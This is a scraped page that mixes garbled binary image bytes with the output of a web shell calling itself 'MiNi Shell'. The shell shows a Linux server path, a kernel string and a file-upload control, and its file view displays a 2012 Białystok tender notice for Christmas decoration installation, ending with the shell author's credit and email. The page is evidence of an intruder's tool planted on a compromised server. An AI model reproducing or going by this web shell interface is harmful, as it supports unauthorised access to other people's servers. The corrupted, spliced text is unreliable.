JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121113/447940-N-2012.html

<p class="kh_header"><b>Białystok: MONTAŻ, DEMONTAŻ ORAZ BIEŻĄCA KONSERWACJA ELEMENTÓW DEKORACJI ŚWIĄTECZNO - NOWOROCZNEJ MIASTA BIAŁEGOSTOKU</b><br>
<b>Numer ogłoszenia: 447940 - 2012; data zamieszczenia: 13.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MONTAŻ, DEMONTAŻ ORAZ BIEŻĄCA KONSERWACJA ELEMENTÓW DEKORACJI ŚWIĄTECZNO - NOWOROCZNEJ MIASTA BIAŁEGOSTOKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest ekspozycja, (montaż demontaż) elementów dekoracyjnych będących w posiadaniu Zamawiającego wraz z ich bieżącą konserwacją.
2.Zakres zamówienia obejmuje w szczególności:
2.1. Ekspozycję dekoracji świąteczno - noworocznej będącej w posiadaniu Zamawiającego:
A) 	montaż, na rondzie im. dr A. P. Lussy, jednej choinki świetlnej wykonanej z profilu aluminiowego oplecionego igliwiem, z podświetlonymi dużymi żarówkami koloru białego;
B) 	montaż, na Placu Niepodległości im. R. Dmowskiego, dwóch sztuk choinek świetlnych wykonanych z profili aluminiowych oplecionych igliwiem, z podświetleniem dużymi żarówkami koloru białego;
C) 	montaż na słupach miejskiego oświetlenia drogowego 60 sztuk girland - elementów dekoracji świątecznej, wykonanych z profili aluminiowych oplecionych tworzywem sztucznym imitującym gałązkę świerkową, podświetlenie wykonane z węża świetlnego typu Neolight o wymiarach 2m x 3m;
D) 	rozwieszenie 24 sztuk łańcuchów tradycyjnych z oprawką E29, o mocy żarówki 15W, w centrum miasta na pięciu świerkach wskazanych przez Zamawiającego;
E) 	montaż, na Placu Uniwersyteckim oraz ul. Liniarskiego, 24 sztuk choinek świetlnych wykonanych z profili aluminiowych oplecionych tworzywem sztucznym imitującym gałązkę świerkową, z podświetleniem wykonanym z węża świetlnego koloru białego typu Neolight;
F) 	udekorowanie, drzew wskazanych przez Zamawiającego, sznurami elektrycznymi różno- i jednokolorowymi, w ilości 500 sztuk (z małymi żaróweczkami);
G) 	montaż na słupach wskazanych przez Zamawiającego, 46 sztuk lampionów ośmioramiennych wykonanych z płaskownika aluminiowego profilowanego o wymiarach ramienia 160x30cm oplecionego wężem świetlnym okrągłym w kolorze żółtym;
H) 	udekorowanie Rajskiego Drzewka, zlokalizowanego na placu im. Jana Pawła II, sznurami świetlnymi koloru czerwonego, w ilości 25 sztuk, przeznaczonymi do ekspozycji zewnętrznej;
I) 	montaż, na słupach stylowych w ciągu ul. Rynek Kościuszki na odcinku od ul. I. Malmeda do ul. L. Zamenhoffa, 240m Girlandy wykonanej z igliwia imitującego gałązkę świerkową oplecioną sznurem typu LED koloru ciepła biel oraz 240m Girlandy wykonanej z igliwia imitującego gałązkę świerkową oplecioną sznurem świetlnym typu LED koloru czerwonego;
J) 	montaż, na słupach stylowych w ciągu ul. Rynek Kościuszki na odcinku od ul. L. Zamenhoffa do Placu im. Jana Pawła II oraz na odcinku ul. Suraskiej, 450m Girlandy wykonanej z igliwia imitującego gałązkę świerkową oplecioną sznurem typu LED koloru ciepła biel oraz 450m Girlandy wykonanej z igliwia imitującego gałązkę świerkową oplecioną sznurem świetlnym typu LED koloru czerwonego;
K) 	montaż, na słupach stylowych w ciągu ul. Rynek Kościuszki na odcinku od ul. H. Sienkiewicza do ul. Kościelnej po obu stronach, 355m Girlandy wykonanej z igliwia imitującego gałązkę świerkową o średnicy 18cm oplecioną sznurem świetlnym typu LED koloru ciepła biel oraz 355m Girlandy wykonanej z igliwia imitującego gałązkę świerkową o średnicy 18cm oplecioną sznurem świetlnym typu LED koloru czerwonego;
L) 	zawieszenie na pięciu drzewach, wzdłuż zachodniej pierzei Rynku Kościuszki, poniższych elementów dekoracyjnych:
Typ elementu kolor węża świetlnego
Biały
Czerwony
Niebieski
Choinka 
18 szt.
14 szt.
16 szt.
Dzwonek
18 szt.
14 szt.
16 szt.
Gwiazdka
18 szt.
14 szt.
14 szt.
Bombka
18 szt.
14 szt.
14 szt.
Prezent
18 szt.
14 szt.
14 szt.

Ł)  montażu, na bazie istniejącej fontanny zlokalizowanej w centralnej części Rynku Kościuszki, konstrukcji iluminacji w kształcie fontanny świetlnej, składającej się z elementów imitujących tryskające strumienie wody z zastosowaniem dynamicznego oświetlenia typu LED w kolorze ciepła biel. Kontury każdego strumienia wykonane są z węża typu LED. Wypełnienie konturu wykonane oświetleniem LED anonsowanym - imitującym ruch wody.

M) 	montaż na słupach oświetleniowych w centralnej oraz wschodniej części Rynku Kościuszki 68 pełnych (136 połówek) kul świetlnych o średnicy O 80cm, o czerwonym wypełnieniu sferycznym (powłoce) z błyszczącego tworzywa, odpornego na warunki atmosferyczne. W wypełnieniu sferycznym wplecione punktowe elementy świecące ze sznura świetlnego koloru białego typu LED oraz wkomponowane elementy w formie gwiazd, pustych w środku, wykonanych z węża świetlnego typu LED, w podwójnym oplocie na konstrukcji z płaskownika aluminiowego. 
N)	Podświetlenie dekoracyjne Pałacyku Gościnnego przy ul. J. Kilińskiego wykonanie poprzez wyświetlenie obrazu w kolorze Biało - Czerwonym o grafice flagi narodowej za pomocą dwóch projektorów o jasności 7000 ansi lumenów. Projektory winne wyświetlać jeden spójny obraz. Projektory winne być zamontowane na balkonie zlokalizowanym pierwszym piętrze budynku Muzeum Wojska po przeciwnej stronie Pałacyku Gościnnego.  
2.2.  Konserwację elementów iluminacji:
A) 	przed okresem ekspozycji oraz bezpośrednio po niej Wykonawca dokona przeglądu elementów iluminacji będących w posiadaniu Zamawiającego, oraz naprawi wszelkie uszkodzone elementy własnym staraniem i na własny koszt;
B) 	przed ozdobieniem miasta dekoracjami świąteczno - noworocznymi należy wymienić na nowe wszystkie żarówki zamontowane na elementach choinek, wymienione, lecz sprawne mogą służyć do bieżącego uzupełniania w czasie ekspozycji;
C) 	każdego dnia ekspozycji Wykonawca dokona kontroli wszystkich elementów dekoracji świąteczno - noworocznej w zakresie poprawnego oraz bezpiecznego jej funkcjonowania, w trakcie niniejszego przeglądu należy ocenić stan techniczny zamocowań mechanicznych oraz bezpieczeństwa pod względem elektrycznym;
D) 	Wykonawca zobowiązany będzie również do niezwłocznej wymiany wszystkich przepalonych żarówek w ekspozycji oraz utrzymania w sprawności pozostałych sznurów z małymi żarówkami, a w razie ich uszkodzenia dokonania ich naprawy;
E) 	w czasie ekspozycji należy utrzymać w sprawności wszystkie elementy mechaniczne i zamocowania elementów dekoracji, w przypadku stwierdzenia uszkodzenia należy dokonać naprawy własnym staraniem i na własny, z wyjątkiem sytuacji omówionej w punkcie G;
F) 	wszystkie materiały eksploatacyjne (żarówki, osprzęt do projektorów, puszki, kable) niezbędne do poprawnej pracy ekspozycji Wykonawca zapewnia własnym staraniem i na własny koszt;
G) 	w przypadku zniszczeń spowodowanych wandalizmem, kradzieżą lub których przyczyną był wypadek drogowy, Wykonawca zobowiązany jest powiadomić Zamawiającego o zaistniałej sytuacji oraz w przypadku zagrożenia życia lub zdrowia - złożyć meldunek na policji niezwłocznie, jednak nie później niż w ciągu 2 dni od momentu, w którym Wykonawca dowiedział się o powstałej szkodzie. Prace związane z usuwaniem skutków powyższych uszkodzeń, kradzieży bądź zniszczeń wchodzą w zakres prac konserwacyjnych. Koszty za materiały zużyte do napraw koniecznych wskutek wandalizmu, kradzieży bądź wypadków drogowych, zostaną zwrócone Wykonawcy o ile do faktury za konserwację dołączy fakturę za ww. materiały oraz dołączy złożony na policji meldunek o zniszczeniach.
2.3.  Przechowanie elementów dekoracji świąteczno - noworocznej do czasu kolejnej ekspozycji:
A) w okresie między ekspozycjami dekoracji świąteczno - noworocznej Wykonawca będzie przechowywał wszystkie elementy dekoracyjne w odpowiednim do tego, suchym, zamkniętym pomieszczeniu, które zorganizuje własnym staraniem i na własny koszt.
3. Obowiązki Wykonawcy dotyczące realizacji zamówienia:
1.Szczegółowe rozwiązania w zakresie lokalizacji elementów dekoracyjnych Wykonawca uzgodni z  Zamawiającym przy udziale Departamentu Urbanistyki.
2.Prace montażowe związane z zawieszeniem elementów dekoracji należy zakończyć do 1 grudnia każdego roku. Nie dotyczy to sytuacji opisanej w pkt 2.1. ppkt N). Podświetlenie dekoracyjne Pałacyku Gościnnego winno być wykonane w dniach 01-03 maja oraz 10-11 listopada każdego roku.
3.Fizyczne połączenie zamontowanych elementów dekoracji świąteczno - noworocznej do linii oświetleniowej winno nastąpić 5 grudnia, w porozumieniu i z udziałem konserwatora oświetlenia ulicznego oraz właściciela urządzeń oświetleniowych.
4.Podłączenia elementów iluminacji do słupów oświetlenia ulicznego należy wykonać przy zachowaniu odpowiednich przepisów BHP.
5.Po zainstalowaniu urządzeń należy wykonać wszelkie niezbędne pomiary elektryczne zgodnie z obowiązującymi przepisami.
6.W przypadku awarii zagrażającej bezpieczeństwu, zabezpieczenie miejsca winno nastąpić bezwarunkowo, bez względu na godzinę wystąpienia zdarzenia, w ciągu 45 minut od momentu zgłoszenia lub stwierdzenia awarii przez Wykonawcę.
7.Ekspozycja trwa od 1 grudnia do 2 lutego. Okres niniejszy może zostać skrócony bądź wydłużony na pisemny wniosek Zamawiającego.
8.Przed okresem ekspozycji oraz bezpośrednio po niej Wykonawca przy udziale Zamawiającego dokona przeglądu wszystkich elementów iluminacji oraz naprawi wszelkie niesprawne własnym staraniem i na własny koszt. Nie dotyczy to sytuacji opisanej w pkt 2.2. ppkt G).
9.Po okresie ekspozycji Wykonawca zdemontuje elementy dekoracyjne w ciągu dwóch tygodni oraz przewiezie do miejsca składowania, własnym staraniem i na własny koszt.
10.Wykonawca będzie przechowywał elementy dekoracyjne w pomieszczeniu magazynowym, pozwalającym na przechowanie po okresie świątecznym wszystkich przekazanych dekoracji. Wykonawca w Formularzu Ofertowym - załącznik nr 6 wskaże jego lokalizację).
11.Po zakończonej ekspozycji sporządzony zostanie protokół przy udziale Zamawiającego i Wykonawcy, mający na celu określenie stanu technicznego poszczególnych elementów dekoracji świąteczno - noworocznej.
12.Po upływie terminu obowiązywania umowy Wykonawca, w ciągu czterech tygodni, przekaże wszystkie sprawne elementy dekoracji protokołem zdawczo - odbiorczym.
13.Wykonawca w czasie obowiązywania umowy zapewni transport Zamawiającemu do miejsc związanych z zakresem zamówienia w celu dokonania wizji lokalnej lub sporządzenia protokołów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.10.00-3, 31.52.72.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku Wykonawca winien wykazać się, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje co najmniej 1 usługę polegającą na konserwacji, montażu/demontażu elementów dekoracji świątecznej o wartości min. 50 000 PLN brutto (w przypadku zamówienia w trakcie realizacji wartość wykonanego zamówienia winna wynosić min. 50.000 PLN z załączeniem dokumentu potwierdzającego, że prace zostały wykonane lub są wykonywane należycie - wg załącznika nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, iż dysponuje co najmniej 2 podnośnikami samochodowymi z koszem - wg załącznika nr 5 do SIWZ, wraz z informacją o podstawie dysponowania tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, iż dysponuje osobami posiadającymi świadectwa kwalifikacyjne w zakresie eksploatacji i dozoru przy pracach związanych z urządzeniami elektroenergetycznymi w rozumieniu ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz. U. z 2006 Nr 89 poz. 625 ze zm) lub uprawnienia kwalifikacje uzyskane na podstawie odrębnych przepisów prawa , tj. osobami które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami:
       -  co najmniej 1 osoba posiadająca ważne świadectwo kwalifikacyjne D
	   -  co najmniej 1 osoba posiadające ważne świadectwo kwalifikacyjne E,
	   Zamawiający dopuszcza  dysponowanie 1 osobą posiadającą świadectwo kwalifikacyjne D i E  - wg załącznika nr 4 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)każdy Wykonawca  zobowiązany jest złożyć oddzielnie dokumenty określone w Rozdziale III.4.2) tiret 2,
2)warunki dotyczące posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia badane będą łącznie - dokumenty określone w Rozdziale III.4.1) tiret 1-4 winien złożyć co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;
3)oświadczenie o spełnieniu warunków udziału w postępowaniu oraz oświadczenie o braku podstaw do wykluczenia składa pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
2. Zgodnie z art. 26 ust 2b) i 2c) ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie do udostępnienia zasobów w trybie art. 26 ust. 2b ustawy Pzp winno być sporządzone zgodnie z zasadami reprezentacji podmiotu, który takie zobowiązanie podejmuje.


3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Rozdziale III.4.3.1 tiret 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokument, o którym mowa powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się  zmianę wynagrodzenia w następujących przypadkach:
1)	rezygnacji z  realizacji  części prac,
2) 	zmiany stawki podatku VAT wynikającej z obowiązującego  prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku
Zarząd Dróg i Inwestycji Miejskich 
ul. Składowa 11 pokój nr 205 (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2012 godzina 08:45, miejsce: Urząd Miejski w Białymstoku
Zarząd Dróg i Inwestycji Miejskich 
ul. Składowa 11 pokój nr 205 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com